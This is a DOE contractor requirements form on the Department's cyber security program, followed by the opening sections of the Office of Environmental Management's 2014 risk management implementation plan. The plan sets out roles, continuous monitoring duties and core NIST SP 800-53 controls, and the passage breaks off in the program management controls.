Contractor Requirements Document (Supplemented) Form
DOE-RL-RIMS-RPMS-RM-Supplemented Contractor Requirements Document 1 of 1
CRD #: CRD O 205.1B, Chg. 2 (Supplemented Revision 2)
Title: Department of Energy Cyber Security Program
Applicable Contractor(s): RCC; OccMed X; PRC X; MSC X; Other X (TOC, ATL, BNI)
Section A – Headquarters CRD: DOE O 205.1B, Chg. 2, Attachment 1
Section B – General Clarifications: Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item 1 reads:
“1. The contractor is responsible for assessing and managing risk within its environment, in the context of acceptable mission risk set collaboratively with the Federal Site Manager.”
The “acceptable mission risk” (i.e., the drivers for a site-specific cyber security risk approach) is to be included in the Site Risk Management Approach document after consultation with the RL Authorizing Official and RL Authorizing Official Designated Representatives.
Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item #2 reads:
“2. The contractor must formally establish a Site Risk Management Approach (RMA) that is consistent with the requirements of the applicable Senior DOE Management (SDM) RMA implementation plan.”
The “SDM RMA implementation plan” shall refer to the Office of Environmental Management (EM) Cyber Security Policy and Risk Management Approach Implementation Plan (attached).
Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item #4 reads:
“4. The contractor must establish and implement a configuration management approach. Where mission appropriate, the approach must consider federally established configurations, such as the Federal Desktop Core Configuration (FDCC) as an alternative.”
This approach must use Federally established configuration baselines where possible, be documented in the system security plan, and be approved by the RL Authorizing Official.
Section C – Specific Clarifications:
MSC, OccMed, PRC, TOC, and ATL: Because MSC, OccMed, PRC, and TOC all share the same network (Hanford Federal Cloud), MSC will have the lead in developing a common authorization boundary (or boundaries) with associated security assessment and authorization documentation. MSC will solicit input from the other organizations to incorporate their organization-specific requirements into supplemental system security plans.
Section D – General Supplemental Requirements: None.
Section E - Specific Supplemental Requirements: None.
DOE EM RMAIP 1 of 266
Office of Environmental Management (EM) Cyber Security Policy and Risk Management Approach Implementation Plan
February 2014
Office of Environmental Management, U.S. Department of Energy
Washington, DC
Table of Contents
SCOPE ..... 5
APPENDICES ..... 5
REFERENCES ..... 6
INTRODUCTION ..... 6
  AUTHORIZING OFFICIAL ..... 11
  AUTHORIZING OFFICIAL DESIGNATED REPRESENTATIVE ..... 11
  EM CYBER SECURITY PROGRAM MANAGER ..... 12
  RISK EXECUTIVE (RE) ..... 12
  INFORMATION SYSTEM SECURITY MANAGER ..... 13
  CERTIFICATION AGENT (CA) ..... 14
  INFORMATION SYSTEM SECURITY OFFICER (ISSO) ..... 14
  INFORMATION TECHNOLOGY CONTINGENCY PLANNING DIRECTOR ..... 14
  DATABASE ADMINISTRATOR (DBA) ..... 15
  APPLICATION ADMINISTRATOR (AA) ..... 15
  NETWORK DEVICE ADMINISTRATOR (NDA) ..... 15
  CONTRACTING OFFICER (CO) ..... 16
CORE CONTROLS ..... 17
PROGRAM MANAGEMENT CONTROLS ..... 20
EM CENTRAL REPOSITORY, EGOV RISK PORTFOLIO MANAGER (EGOV RPM) ..... 23
EM CM TEAM RESPONSIBILITIES FOR WORKING WITH EM SITES ..... 24
EM SITES CONTINUOUS MONITORING RESPONSIBILITIES ..... 25
INHERITED CONTROL GUIDANCE ..... 28
AO’S ANNUAL REAUTHORIZATION RESPONSIBILITIES ..... 28
NATIONAL SECURITY SYSTEMS ..... 28
FEDERAL INFORMATION SYSTEMS MANAGEMENT ACT OF 2002 ..... 29
EM HQ MISSION INFORMATION PROTECTION PROGRAM (MIPP) SUPPORT AND PARTICIPATION ..... 30
CONTINGENCY PLANNING ..... 31
CONTRACTOR REQUIREMENTS, SYSTEM ACQUISITION AND SERVICES ..... 32
SUPPLY CHAIN RISK MANAGEMENT ..... 32
DOE’S ENHANCED CYBER SECURITY SERVICES (DEX) ..... 33
MOBILE DEVICE GUIDELINES FOR FOREIGN TRAVEL ..... 33
FOREIGN NATIONALS ..... 33
HSPD-12 REQUIREMENTS AND PROJECTED MILESTONES ..... 34
IPV6 REQUIREMENTS AND PROJECTED MILESTONES ..... 34
DOMAIN NAME SYSTEM SECURITY EXTENSIONS (DNSSEC) ..... 35
INDUSTRIAL CONTROL SYSTEMS ..... 35
WIRELESS INFORMATION SYSTEMS ..... 35
CONTROLLED UNCLASSIFIED INFORMATION (CUI) PROTECTION ..... 36
APPENDIX A – NIST SP 800-53 REV 4 SECURITY CONTROLS AND GUIDANCE ..... 37
APPENDIX B – NSS SECURITY CONTROLS ..... 149
APPENDIX C – NIST SP 800-53 REV 4 CONTROL FAMILY POLICIES ..... 242
APPENDIX D – EM CONTRACTOR REQUIREMENTS ..... 257
ACRONYM LIST ..... 265
Purpose
The purpose of this document is to implement the Department of Energy (DOE) Risk Management Approach (RMA), as described in DOE O 205.1B, Chg. 2, Department of Energy Cyber Security Program, within the Office of Environmental Management (EM). This document cancels the DOE Office of Environmental Management Program Security Plan, dated February 2009. This document is the Senior DOE Management (SDM) Cyber Security RMA Implementation Plan (IP) for EM Headquarters (HQ) and EM sites.
Scope
This RMAIP sets forth EM policy concerning cyber security requirements and provides EM sites with guidance and, where applicable, direction concerning specific requirements. The requirements found in this document are in addition to the requirements set forth in National Institute of Standards and Technology (NIST) Federal Information Processing Standards (FIPS)/Special Publications (SP), Committee on National Security Systems (CNSS) and DOE O 205.1B, Chg. 2. The latest versions of NIST, FIPS and CNSS documents should be used in accordance with contractual requirements. For the purposes of this document, the term “sites” includes EM HQ, sites and facilities.
Applicability
This document applies to all EM sites and their respective information processing systems, both government-owned and government-owned/contractor-operated systems, that process, store, or communicate EM information/data. Field managers are to ensure that contractor-developed Risk Management Approach documents required by DOE O 205.1B, Chg 2, Attachment 1, meet the requirements of this RMAIP.
This document also applies to National Security Systems (NSS) operating on behalf of or located on EM sites that process, store, or communicate sensitive information (see NIST 800-59 for determination of NSS systems). EM sites must use DOE O 205.1B, Chg. 2, the most current versions of NIST SP 800 series specific to cyber security/accreditation, and CNSS Publications specific to the accreditation of NSS. The Office of Corporate Information Technology, EM-72, has prepared Appendix B – NSS Security Controls, to assist the sites in system categorization and implementation of the CNSS security controls. EM sites also must use the latest version of NIST SP 800-82 for securing the Industrial Control Systems (ICS) that collect, process, or store data to support the EM mission.
Questions regarding this document should be directed to the EM Cyber Security Program Manager (EM CSPM) at [email protected].
Appendices
Appendix A – NIST SP 800-53 Rev 3 Security Controls and Guidance
Appendix B – NSS Security Controls
Appendix C – NIST SP 800-53 Rev 3 -1 Control Policies
Appendix D – EM Contractor Requirements
Appendix E – NIST 800-27 Rev A Engineering Principles
Appendix F – Sanitization and Disposal of Media and Mobile Devices
References
The most current versions of these documents are to be used by sites to secure IT systems that support the site missions.
1. Title III of the E-Government Act of 2002, entitled the Federal Information Security Management Act (FISMA) of 2002
2. Office of Management and Budget (OMB) Circular A-130, Appendix III, 2000
3. DOE Order 205.1B, Chg 2, DOE Cyber Security Management, May 2011
4. DOE Order 206.2, Identity, Credential, and Access Management, Feb 19, 2013
5. DOE 470.4-1B, Chg. 1, Safeguards and Security Program, July 2011
6. DOE Order 142.3A, Unclassified Foreign Visits and Assignments Program, October 14, 2010
7. FIPS 200, Minimum Security Requirements for Federal Information and Information Systems, March 2006
8. FIPS 199, Standards for Security Categorization of Federal Information and Information Systems, February 2004
9. NIST SP 800-18 (Feb 2006), 800-30 (Sept 2012), 800-34 (May 2010), 800-37 (Feb 2010), 800-40 (Sept 2012), 800-52 (2005), 800-53 (April 2013), 800-63 (Feb 2013), 800-71, 800-73 (May 2013), 800-76 (July 2012), 800-78 (May 2013), 800-81 (April 2010), 800-82 (April 2013), 800-88 (Sept 2012), and 800-100 (Oct 2006)
10. Committee on National Security Systems (CNSS) 1253 (March 2012)
Introduction
EM information and information systems are critical to successful mission and business operations, and are dependent on the underlying information technology (IT) infrastructure. IT systems have become vital to performing and protecting the EM mission, assets, and personnel, and must be protected in a manner commensurate with the impact to EM’s mission, acceptable risk levels, security requirements, and potential magnitude of harm. Disruption of IT systems can cause delays in achieving mission milestones, productivity losses, loss of critical data, and can create data integrity issues that negatively impact mission success.
Secure IT solutions will enable EM to:
• Be more efficient and productive in delivering IT services to meet or exceed cleanup milestones
• Execute business operations that result in more waste shipments and lower life-cycle cost
• Increase productivity
• Leverage secure and enhanced wireless services for more efficient waste monitoring, processing, removal, inventory, and storage
• Decrease energy costs by producing greener IT services
As government IT systems continue to be the target of daily sophisticated security attacks, signature-based protection programs, annual assessments and three-year static certification and accreditation (C&A) processes are no longer effective against this advanced persistent threat. Systems change, threats emerge, and sophisticated attacks occur on a daily basis. Only active monitoring of security controls can prevent or address the detection, analysis, eradication, and timely incident response activities associated with these attacks.
FISMA requirements, OMB memorandums/policy, and NIST standards and guidelines require a Continuous Monitoring (CM) approach for all Federal agency systems whether operated by federal or contractor staff. CM is the process required to constantly monitor the security posture and risk levels of an accreditation boundary or system to make certain that changes or successful attacks have not degraded the performance, affected the level of security controls, or created vulnerabilities in an IT system. The objective of a CM process is to determine if the complete set of planned, required, and deployed security controls within an information system, or controls inherited by the system, continue to be effective and adequate over time. A key aspect of a correctly planned and executed CM process is ensuring that current security controls are adequate to mitigate newly discovered threats, access or use violations, escalation of privileges, alteration of configurations, loss of confidentiality, and changes in data integrity or availability. CM also requires additional controls, above and beyond the NIST SP 800 series, to be developed and implemented to mitigate evolving threats. When tailoring controls, EM HQ and EM sites are encouraged to add controls specific to their site and mission that may not be identified in NIST documentation.
An effective CM process validates that security safeguards are implemented correctly, operating as intended, and produce valid security results sufficient to protect the system. CM is used to stay abreast of malicious activity, evolving threats, and identified vulnerabilities to enable sound decision making. This means that sites are expected to be proactive in meeting these new threats, vulnerabilities, and attacks without waiting for contractual changes in their respective contracts. It is also expected that federal and contractor staff will take appropriate action, based on sound risk-management decisions, to mitigate the evolving threat. This includes updating hardware and software that is outdated and unsupported by vendors, purchasing additional tools as technology advances, and mitigating any vulnerability due to technologic advancements. IT systems must evolve based on the threat. As hardware and software is updated or replaced, site IT staff should use sound engineering principles, as identified in NIST 800-27 (as modified), while conducting daily tasks. Appendix E is provided as guidance for sites concerning engineering principles as they apply to IT systems.
A key component of CM is the continuous assessment of risk and the deployment of controls in a timely manner to mitigate the risk to an acceptable level. The Department’s RMA, as documented in DOE O 205.1B, Chg 2, governs the continuous assessment of risk. EM sites must use the six steps of the Risk Management Framework (RMF), including a full Security Test and Evaluation (ST&E) for Authority to Operate (ATO), as required by FISMA and addressed in NIST SP 800 series documents for initial accreditation of a system and to protect DOE information systems and data (categorization, selection of security controls, implementation of controls, assessment of the security controls, system authorization to operate and continuous monitoring). Currently, all EM systems have an ATO and have varying reauthorization dates. Systems currently authorized to operate must follow the Department’s RMA, CM, and Continuous Authorization to Operate (CAO) instructions outlined in this document.
Cloud computing must use the Federal Risk and Authorization Management Program (FedRAMP) select controls for accreditation if providing cloud services to other programmatic elements or federal agencies. Cloud services that are purchased must use the FedRAMP services to ensure that they are accredited to federal standards. Purchase agreements must contain appropriate language to ensure that the provider of service is FedRAMP accredited.
At the end of the CM year, the accumulation of scan results, verified data documents, updated Risk Assessment (RA), and Plan of Action and Milestones (POA&M) will allow the Authorizing Official (AO) to make a risk-based decision on the system’s ATO. The CM year begins the day the ATO is signed by the AO.
The CM process outlined in this document moves EM sites from a document-intensive and three-year certification process to a more proactive, less laborious, and less expensive CM process which will result in a risk-based decision annually regarding the ATO of the system(s). This RMAIP will be periodically updated and revised to reflect new and ongoing cyber security risks and issues, as well as changes to national policy, Departmental policy, and other security guidance.
Department of Energy Risk Management Approach (RMA)
For systems that are currently operational and have an ATO, the Department’s RMA (see Fig. 1) is a four-step process used in the assessment of risk during step 6 (see Fig. 2) of the NIST Risk Management Framework (RMF). The RMA integrates into the NIST RMF, a six-step process that addresses the life-cycle of an information system. These two concepts are to be used in the management of risk for all EM IT systems. The first three steps of the RMA integrate into RMF step 2 (select security controls) and RMF step 3 (the implementation of controls) when authorizing a new system (see Fig. 2). Step 4 of the RMA is to be used in concert with and replaces RMF step 6 (see Fig. 2). The RMA specifically calls out the stakeholders that should be involved in the risk determination and mitigation process.
The RMA deals mainly with the identification, monitoring, and management of risk based on mission needs. All operational and accredited systems should be in the CM step of the RMF. New systems, not yet accredited or approved for operation by the AO, must undergo the entire six-step RMF and four-step RMA before they are allowed to operate, unless given temporary and conditional authorization by the AO. If mission dictates that a system must become operational, the AO has the authority to grant conditional authorization to operate prior to a full certification of the system. The four-step RMA is to be used to assess risk when major changes in the system, threat, or risk are identified for all systems operating with a current ATO. For systems that are already operational, the four-step RMA is used to assess risk and to make risk-based decisions for future ATOs.
In order to accomplish the assessment of risk, a Business Impact Assessment (BIA) must be conducted. Each system must have a current BIA on file, or be identified in a BIA for the site network, with the authorization documentation. The BIA must be completed with input from the business stakeholders, IT staff, and system owners. A single BIA for an entire network, regardless of the number of authorized boundaries, is an acceptable approach.
Figure 1: DOE Risk Management Approach (RMA) Process (DOE Department RMA; Senior DOE Management (SDM) Cyber Security RMA Implementation Plans (IP))
Step 1: Risk Framing. Involves: SDM & Federal Site Manager, Senior Site Manager, Authorizing Official. Inputs: Threat Statements, Risk Response, Risk Monitoring. Activities: Establish risk assumptions, constraints, & tolerance; ID priorities & trade-offs. Outputs: Risk Management Strategy communicated to AO and Site CIO.
Step 2: Risk Assessment. Involves: Authorizing Official, Site CIO. Inputs: SDM RMA IP, Risk Response, Risk Monitoring. Activities: ID threats and vulnerabilities; Determine risk in context of mission. Outputs: Risk Determination, Residual Risk, Resource Requirements, Communications.
Step 3: Risk Response. Involves: Authorizing Official, Site CIO. Inputs: Risk Assessment, SDM RMA IP, NIST Requirements & Guides. Activities: ID and evaluate risk response alternatives; Determine appropriate risk response; Implement cyber security protections. Outputs: Approved & implemented cyber security protections.
Step 4: Risk Monitoring. Involves: Federal Site Manager, Senior Site Manager, Authorizing Official. Inputs: Approved cyber security protections, Risk Management Strategy. Activities: Risk monitoring strategy; Risk monitoring; Contractor assurance; Federal oversight. Outputs: Cyber security effectiveness evaluation; RMA process assessment.
Figure 2: How the RMF and RMA work together for EM (process overview)
Starting point: Architecture Description (Architecture Reference Models; Segment and Solution Architectures; Mission and Business Processes; Information System Boundaries) and Organizational Inputs (Laws, Directives, Policy Guidance; Strategic Goals and Objectives; Priorities and Resource Availability; Supply Chain Considerations).
Risk Management Framework: Step 1 CATEGORIZE Information System; Step 2 SELECT Security Controls; Step 3 IMPLEMENT Security Controls; Step 4 ASSESS Security Controls; Step 5 AUTHORIZE Information System; Step 6 MONITOR Security Controls (repeat as necessary).
RMA overlay: RMA Step 1 Risk Framing; RMA Step 2 Risk Assessment; RMA Step 3 Risk Response; RMA Step 4 Risk Monitoring.
Roles and Responsibilities
This section describes the roles and responsibilities of key participants involved in an organization’s CM process. Recognizing that staffing is a concern, care must be taken to ensure separation of duties is adhered to when appointing these roles. One individual may perform multiple roles as long as an insider threat vulnerability is not created. An insider threat may be presented by a malicious user who has approved access to EM information and information systems and who can use that access to cause damage or steal sensitive information and system components. The key participants and their responsibilities are described below.
Authorizing Official
1. Must be a federal employee appointed in writing by the Assistant Secretary for EM.
2. Ensures that the requirements of the RMAIP are implemented.
3. Accepts risk for the operation of an IT system.
4. Directly appoints, in writing, a federal employee as the AO Designated Representative (AODR).
5. Furnishes a copy of the appointment letter for the AODR to the Cyber Security Program Manager at EM Headquarters as well as the site Information System Security Manager (ISSM) within 60 days of appointment.
6. Appoints a new or Acting AODR in the event of personnel turnover or extended absence of the AODR. An appointment letter for a new or Acting AODR must be disseminated within twenty-one (21) business days of the departure of the previous AODR.
7. Ensures direct access to the AODR for all cyber security matters.
8. Receives, at least quarterly, a formal cyber security status briefing directly from the AODR.
9. Ensures that personnel are appointed, in writing, to the roles of System Owner, ISSM, Information System Security Officer (ISSO), and Information Technology Contingency Planning Director.
Authorizing Official Designated Representative
1. Must be a federal employee appointed in writing by the AO.
2. Acts on behalf of the AO (e.g., holds meetings, reviews SSPs, determines major vs. minor changes) as specified in the appointment letter.
3. Acts for the AO, but cannot formally accept risk to operate any system.
4. Maintains continual awareness of the cyber security posture of the AO’s area of responsibility, in coordination with the ISSM and other individuals as necessary.
5. Coordinates the formal written appointments of the System Owner, ISSM, ISSO, and IT Contingency Planning Director with the AO and other appropriate site-level management personnel.
6. Develops and presents a formal cyber security status briefing to the AO on a quarterly basis, or more frequently at the AO’s request.
EM Cyber Security Program Manager
1. Must be a federal employee located at EM HQ with cyber security responsibilities for the EM IT enterprise.
2. Maintains the RMAIP so that it remains consistent with the DOE RMA and with current federal cyber security policies.
3. Conducts cyber security oversight for the enterprise.
4. Justifies the need for and coordinates the implementation of standard solutions for cyber security concerns across the enterprise.
5. Delivers quarterly and annual FISMA reports and responds to all OMB and Chief Information Officer (CIO) data calls.
Risk Executive (RE)
The RE is a function performed by an individual or group within an organization that helps to ensure that: (1) risk-related considerations for individual information systems, to include authorization decisions, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its core missions and business functions; and (2) management of information system-related security risk is consistent across an organization, reflects organizational risk tolerance, and is considered along with other types of risks in order to ensure mission/business success. A group may be comprised of federal staff and contractors but must be led by a federal employee. The RE coordinates with the senior leadership of an organization to:
1. Provide a comprehensive, organization-wide, holistic approach for addressing risk—an approach that provides a greater understanding of the integrated operations of the organization.
2. Develop a risk management strategy for the organization providing a strategic view of information security-related risks with regard to the organization as a whole.
3. Facilitate the sharing of risk-related information among authorizing officials and other senior leaders within the organization.
4. Provide oversight for all risk management-related activities across the organization (e.g., security categorizations) to help ensure consistent and effective risk acceptance decisions.
5. Ensure that authorization decisions consider all factors necessary for mission and business success.
6. Provide an organization-wide forum to consider all sources of risk (including aggregated risk) to organizational operations and assets, individuals, other organizations and the Nation.
7. Promote cooperation and collaboration among authorizing officials to include authorization actions requiring shared responsibility.
8. Ensure that the shared responsibility for supporting organizational mission/business functions using external providers of information and services receives the needed visibility and is elevated to the appropriate decision-making authorities.
9. Identify the organizational risk posture based on the aggregated risk to information from the operation and use of the information systems for which the organization is responsible.
The RE does not require a specific organizational structure and can be assigned to any one individual or group within the organization. The head of the agency/organization may choose to retain the RE function or to delegate the function to another official or group (e.g., an executive leadership council). The AO must appoint a RE for each system.
System Owner
The System Owner may be a federal or contractor employee that directly supports contingency planning activities described in the RMAIP Contingency Planning section. The System Owner:
1. Identifies appropriate personnel to serve on teams to perform the recovery and reconstitution activities described in each site’s IT Contingency Plan.
2. Ensures that recovery and reconstitution team members receive appropriate annual training.
3. Meets with the IT Contingency Planning Director on a quarterly basis to review team assignments and readiness.
4. Participates in the BIA process.
5. Prepares a business continuity of operations plan for use in the event that a long network outage is observed.
Information System Security Manager
1. The ISSM can be a contractor or federal employee appointed, in writing, by site management. The ISSM for each EM field site can be a federal employee charged with the management responsibility for system security or the contractor employee that reports to the federal employee charged with the management responsibility for system security.
2. The ISSM’s area of responsibility and authority is site-wide in scope and includes both EM federally-owned systems as well as contractor systems which store or process EM-owned data.
3. The ISSM maintains appointment letters for personnel in the ISSM’s area of responsibility.
4. The ISSM is responsible for disseminating the RMAIP to all personnel (including contractors) in the ISSM’s area of responsibility.
5. The ISSM cannot perform the role of Certification Agent (CA) for accreditation boundaries where the ISSM has management authority over the ISSO or other personnel (such as contractors) developing C&A documentation. The CA’s role must be performed by an independent party.
6. The ISSM ensures that at least one database administrator (DBA), application administrator (AA) or network device administrator (NDA) attends an annual security training class, conference, or workshop. An example may include the Information Management Conference (IMC) or a SANS training event. That individual is responsible for bringing the information back to the site for dissemination to all appropriate personnel.
Certification Agent (CA)
1. The CA may consist of federal employees or contractors.
2. The CA is an individual or group that has complete management independence from the personnel that developed the C&A documentation being certified.
3. The CA conducts a comprehensive evaluation of the security controls employed within or inherited by an information system to determine their overall effectiveness.
4. The CA recommends corrective actions to address identified vulnerabilities.
5. The CA writes the Security Assessment Report (SAR) and presents it to the AO. The AO has discretion to accept or mitigate any vulnerability found in the SAR.
Information System Security Officer (ISSO)
1. The ISSO is the primary individual responsible for the day-to-day operation, coordination and execution of security functions, C&A, and all CM activities. A properly cleared and qualified contractor may hold this role. The ISSO coordinates the identification and appointment of Project Security Officers (PSO) with the ISSM and other management officials.
2. The ISSO directly participates in configuration management oversight procedures relevant to the accreditation boundaries that the ISSO oversees.
3. The ISSO meets with the ISSM and PSOs, at minimum, twice per month.
4. The ISSO disseminates the RMAIP to all PSOs within their accreditation boundaries.
Information Technology Contingency Planning Director
1. The IT Contingency Planning Director is appointed at EM field sites by the AODR. A qualified contractor or federal employee with the proper security clearance may hold this role.
2. The IT Contingency Planning Director analyzes and notifies the system owner, ISSM, and other appropriate management personnel of any staffing needs necessary to perform the recovery and reconstitution activities described in each site's Contingency Plan and Project Managers' Contingency Plans.
3. The IT Contingency Planning Director meets with system owners on a quarterly basis to review staffing assignments, contingency plan update status, integration with business continuity of operations or contingency plans, contingency plan testing status, contingency planning POA&M remediation status, and any other matters related to contingency planning.
4. The IT Contingency Planning Director documents a test of the Contingency Plan at least annually. Actual documented use of the Contingency Plan (e.g., in responding to an actual event) may substitute for such a test.
Database Administrator (DBA)
1. A DBA may be a federal or contractor employee.
2. The DBA is responsible for performing administratively-privileged functions on a relational database software product. Privileged functions include but are not limited to configuring database startup parameters, adding and deleting database-level user IDs, granting and revoking rights for users, and creating or modifying table space definitions. A contractor may hold this role with the proper security clearances and background.
3. At least one DBA must attend annual security training such as a SANS training event or the DOE IMC; that individual is responsible for bringing the information back to the site for dissemination to all appropriate personnel.
4. The DBA implements patching requirements on database software products.
5. The DBA implements password management requirements on database software products.
6. The DBA implements the audit logging requirements on database software products.
Application Administrator (AA)
1. An AA may be a federal or contractor employee.
2. The AA is responsible for performing privileged functions in a web-based software application, client-server application, electronic mail server, or other type of application server. Privileged functions include but are not limited to configuring application startup parameters, adding and deleting application user IDs, and granting and revoking folder/workspace permissions for users. A contractor may hold this role with the proper security clearances and background.
3. At least one AA must attend annual security training such as the DOE IMC or a SANS training event. That individual is responsible for bringing the information back to the site for dissemination to all appropriate personnel.
4. The AA implements patching requirements on applicable software applications.
5. The AA implements password management requirements on applicable software applications.
Network Device Administrator (NDA)
1. An NDA may be a federal or contractor employee.
2. The NDA is responsible for performing privileged functions on network infrastructure equipment such as switches, routers, firewalls, remote access equipment, virtual private networking (VPN) equipment and wide area networking (WAN) equipment, hereafter referred to as "network devices." A contractor may hold this role with the proper security clearances and background.
3. At least one NDA must attend annual security training such as the DOE IMC or a SANS training event. That individual is responsible for bringing the information back to the site for dissemination to all appropriate personnel.
4. The NDA implements patching requirements on network devices.
5. The NDA implements password management requirements on network devices.
6. The NDA implements audit logging requirements on network devices.
Contracting Officer (CO)
The CO is a federal employee. The CO ensures the RMAIP is incorporated in EM contracts.

The CO ensures that fee awards consider cyber security performance; see Appendix D for guidance. Cyber security performance must be considered when calculating fee in all fee-based contracts. Fee should not be affected by an intrusion into a network or system by an outside entity, but should be negatively affected if sites do not report those incidents in a timely fashion and in accordance with the DOE Joint Cybersecurity Coordination Center (JC3) guidance. Not all intrusions are preventable; therefore early detection should be rewarded.

The CO works with local IT staff to determine metrics and measure performance. The CO ensures that the EM HQ CSPM has input to fee decisions, based on contractor cooperation in the deployment of HQ EM-provided tools during site assessments.

The CO incentivizes contractors to work together, partner, and share IT solutions and infrastructure to save energy and funding through efficiencies and consolidation where it makes sense.
General Instructions for Continuous Monitoring
Unless otherwise superseded by statute or other Federal policy, directive or guidance, all EM sites must use the instructions in DOE O 205.1B, Chg 2, and this RMAIP (or latest authorized version) to comply with security requirements in defining the risk management processes and mission-adjusted minimum security control baseline requirements necessary for ensuring the protection of unclassified and classified information systems, commensurate with risk and mission needs.

The objective of the RMAIP is to improve EM's organizational protection of information systems and data. All EM systems/accreditation boundaries have some level of sensitivity and require protection as part of good risk management framework practice. The protection of a system must be documented in a site's accreditation boundary System Security Plan (SSP). The SSP must contain the system categorization, system description, a high-level diagram, subsystems, review of security requirements, monitoring strategy, security controls provided by any hosted software (major application), implemented controls with an implementation description, controls tailored out with justification, and accepted risk due to the tailoring process. Security plans are required to be reviewed and updated within eGov Risk Portfolio Manager™ (eGov RPM) at least annually. The role of eGov RPM is discussed below.
The AO for each EM accreditation boundary or site, working in conjunction with the EM CSPM, is responsible for adequately ensuring the confidentiality, integrity, and availability of EM information systems/data and that the systems are operated in accordance with CNSS, NIST and DOE policies and directives.

Senior DOE management, the Federal Site Manager, the contractor's senior IT manager, and the Site IT Director must annually conduct or review an Organization Impact Assessment/BIA and perform a system risk assessment to determine the acceptable level of risk for an accreditation boundary. These assessments will also be used to determine a "mission-adjusted minimum security controls baseline" for a site's system(s). These assessments must be performed for unclassified and classified systems. Performing the assessments will provide the necessary information for the AO to determine the correct tailoring of mission minimum security baseline controls for ATO decisions and CM planning and execution.

The RE, AO, ISSM, ISSO, and site program offices must participate and agree on the organization risk assessments, system categorization level, and the correct selection of mission baseline security controls to be implemented on the accreditation boundary or system. The EM CSPM is available during these processes as required.

A senior-level federal employee must hold the AO function and responsibility. This is essential to ensure that the individual has an overall understanding of budgetary, mission operation, and the organizational requirements of the accreditation boundary, as well as the authority to make decisions concerning such systems.

The site AO is responsible for acceptance of the tailoring of security controls and the decision to not implement a security control. Tailoring decisions must be documented in the SSP with a justification and documentation of any resulting vulnerability or elevated security risk incurred. The site AO can also elect to implement a compensating (equivalent) security control provided it affords the same protection as the replaced control and provides an acceptable level of risk. The use of compensating controls should be documented in the SSP.

The mission-adjusted baseline security controls must be implemented, tested, and documented in an SSP. Sites must perform CM on mission-adjusted minimum security control baselines. eGov RPM must be used to build SSPs and POA&Ms. All CM artifacts such as ATOs, audit reports, scan results, incident reports, contingency plans, and other security documents must be uploaded to eGov RPM.
Core Controls
Core controls must be implemented and must not be tailored out unless a waiver for the core control in question is requested from and granted by the EM CSPM. Core controls are listed in Table 1 below.
Table 1. Core Controls

Columns: Cntl. # / Enhancement # / Item / Control Name, followed by the NIST SP 800-53 control requirement. A dash means the column is blank for that row.

1. AC-5 / 0 / a / Separation of Duties
   The organization: Separates [Assignment: organization-defined duties of individuals];

2. AC-6 / 0 / - / Least Privilege
   The organization employs the concept of least privilege, allowing only authorized accesses for users (and processes acting on behalf of users) which are necessary to accomplish assigned tasks in accordance with organizational missions and business functions.

3. AC-8 / 0 / a.1 / System Use Notification
   The information system: Displays to users [Assignment: organization-defined system use notification message or banner] before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: Users are accessing a U.S. Government information system;

4. AU-6 / 0 / a / Audit Review, Analysis, and Reporting
   The organization: Reviews and analyzes information system audit records [Assignment: organization-defined frequency] for indications of [Assignment: organization-defined inappropriate or unusual activity]; and

5. CA-5 / 0 / a / Plan of Action and Milestones
   The organization: Develops a plan of action and milestones for the information system to document the organization's planned remedial actions to correct weaknesses or deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system; and

6. CM-2 / 0 / - / Baseline Configuration
   The organization develops, documents, and maintains under configuration control, a current baseline configuration of the information system.

7. CM-3 / - / b / Configuration Change Control
   The organization: Reviews proposed configuration-controlled changes to the information system and approves or disapproves such changes with explicit consideration for security impact analyses;

8. CM-7 / 1 / a / Least Functionality
   The organization: Reviews the information system [Assignment: organization-defined frequency] to identify unnecessary and/or nonsecure functions, ports, protocols, and services; and

9. CP-4 / 0 / a / Contingency Plan Testing and Exercises
   The organization: Tests the contingency plan for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests] to determine the effectiveness of the plan and the organizational readiness to execute the plan;

10. IA-2 / 1 / - / Identification and Authentication (Organizational Users)
   The information system uses multifactor authentication for network access to privileged accounts.

11. IA-2 / 2 / - / Identification and Authentication (Organizational Users)
   The information system uses multifactor authentication for network access to non-privileged accounts.

12. IR-3 / 0 / - / Incident Response Testing and Exercises
   The organization tests and/or exercises the incident response capability for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests and/or exercises] to determine the incident response effectiveness and documents the results.

13. IR-4 / 0 / a / Incident Handling
   The organization: Implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery;

14. IR-6 / 0 / b / Incident Reporting
   The organization: Reports security incident information to [Assignment: organization-defined authorities].

15. MA-2 / 0 / d / Controlled Maintenance
   The organization sanitizes equipment to remove all information from associated media prior to removal from organizational facilities for off-site maintenance or repairs; and

16. MP-5 / 4 / - / Media Transport
   The information system implements cryptographic mechanisms to protect the confidentiality and integrity of information stored on digital media during transport outside of controlled areas.

17. PL-4 / 0 / b / Rules of Behavior
   The organization: Receives a signed acknowledgment from such individuals, indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to information and the information system;

18. SA-8 / 0 / - / Security Engineering Principles
   The organization applies information system security engineering principles in the specification, design, development, implementation, and modification of the information system.

19. SC-28 / - / - / Protection of Information at Rest
   The information system protects the [Selection (one or more): confidentiality; integrity] of [Assignment: organization-defined information at rest].
Program Management Controls
The information security program management (PM) controls described in this section complement the security controls in Appendix A and focus on the organization-wide information security requirements that are independent of any particular information system and are essential for managing information security programs.
Columns: Cntl. # / Enhancement # / Item / Control Name, followed by the NIST SP 800-53 PM control requirement and the EM implementation.

PM-1 / 0 / a / Information Security Program Plan
   Requirement: The organization develops and disseminates an organization-wide information security program plan that: provides an overview of the requirements for the security program and a description of the security program management controls and common controls in place or planned for meeting those requirements; provides sufficient information about the program management controls and common controls (including specification of parameters for any assignment and selection operations either explicitly or by reference) to enable an implementation that is unambiguously compliant with the intent of the plan and a determination of the risk to be incurred if the plan is implemented as intended; includes roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is approved by a senior official with responsibility and accountability for the risk being incurred to organizational operations (including mission, functions, image, and reputation), individuals, other organizations, and the Nation;
